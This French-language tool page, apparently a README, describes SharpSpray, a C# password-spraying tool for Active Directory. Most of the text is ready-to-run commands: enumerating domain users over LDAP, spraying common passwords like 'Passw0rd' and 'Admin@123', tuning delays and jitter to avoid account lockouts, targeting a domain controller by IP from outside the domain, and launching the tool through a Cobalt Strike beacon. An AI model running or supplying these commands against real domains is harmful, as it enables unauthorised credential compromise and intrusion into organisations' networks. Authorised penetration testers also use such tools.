
Outil de pulvérisation de mots de passe pour Active Directory. Récupère automatiquement la liste des utilisateurs et évite les verrouillages potentiels.
SharpSpray est un outil de pulvérisation de mots de passe de domaine Windows écrit en .NET C#.
SharpSpray est un portage en C# de DomainPasswordSpray avec des capacités améliorées et supplémentaires. Cet outil utilise le protocole LDAP pour communiquer avec les services d'annuaire Active Directory du domaine.
> SharpSpray.exe --help
-v, --Verbose Afficher les messages verbeux.
-u (Facultatif) Chemin du fichier de liste des noms d'utilisateur. Ce sera automatiquement récupéré depuis l'Active Directory si non spécifié.
-p Un seul mot de passe ou une liste séparée par '|' qui sera utilisée pour effectuer la pulvérisation de mots de passe.
-k, --pl (Facultatif) Chemin du fichier de liste de mots de passe.
-d (Facultatif) Spécifier un nom de domaine.
-m Utilisez cette option si la pulvérisation est effectuée depuis un hôte situé en dehors du contexte du domaine.
-q, --dc-ip Requis lorsque l'option 'm' OutsideDomain est cochée
-x Tente d'exclure les comptes désactivés de la liste des utilisateurs (Non pris en charge avec l'option -m)
-z Exclure les comptes à 1 tentative de verrouillage (Non pris en charge avec l'option -m)
-f Filtre LDAP personnalisé pour les utilisateurs, ex. "(description=*admin*)"
-o Un fichier pour écrire les résultats.
-w Ne pas se fier aux paramètres de la fenêtre d'observation du verrouillage du domaine et utiliser cette valeur spécifique. (Par défaut 32 minutes)
-s (Facultatif) Délai en secondes entre chaque tentative d'authentification.
-j (Facultatif) Jitter en secondes.
--Force Forcer le démarrage sans demander confirmation.
--get-users-list Obtenir la liste des utilisateurs du domaine depuis l'Active Directory.
--show-examples Obtenir la liste des utilisateurs du domaine depuis l'Active Directory.
--show-args Afficher les arguments de la ligne de commande
--help Afficher cet écran d'aide.
SharpSpray.exe -v -x -z --pl password.txt
SharpSpray.exe -v -x -z -p "Passw0rd|Admin@123|Admin@2022"
SharpSpray.exe -v -x -z -p "Passw0rd"
SharpSpray.exe -x -z -u users.txt --pl psswd.txt
SharpSpray.exe -x -z -u users.txt -p Passw0rd!
SharpSpray.exe -x -z -s 3 -j 1 -u users.txt -k psswd.txt -o sprayed.txt
SharpSpray.exe -w 32 -m -d DC-1.local --dc-ip 10.10.20.20 -u users.txt --pl psswd.txt
SharpSpray.exe -w 32 -s 3 -j 1 -m -d DC-1.local --dc-ip 10.10.20.20 -u users.txt --pl psswd.txt
SharpSpray.exe --get-users-list
SharpSpray.exe --get-users-list > users.txt
PS> .\SharpSpray.exe --get-users-list | Out-File -Encoding ascii users.txt
* Using in Cobalt Strike:
beacon> execute-assembly C:\Users\sec\Desktop\tmp\sharpspray.exe --Force -w 32 -s 3 -j 1 -x -z -v -p "Passw0rd|Admin@123|Admin@2022"
* Check Jobs in Cobalt:
beacon> jobs
La commande suivante récupère les utilisateurs du domaine et imprime la liste dans la console.
SharpSpray.exe -x -z --get-users-list
-x: Exclure les comptes désactivés de la liste des utilisateurs.
-z: Exclure les comptes à 1 tentative de verrouillage.
SharpSpray | Outil de pulvérisation de mots de passe Active Directory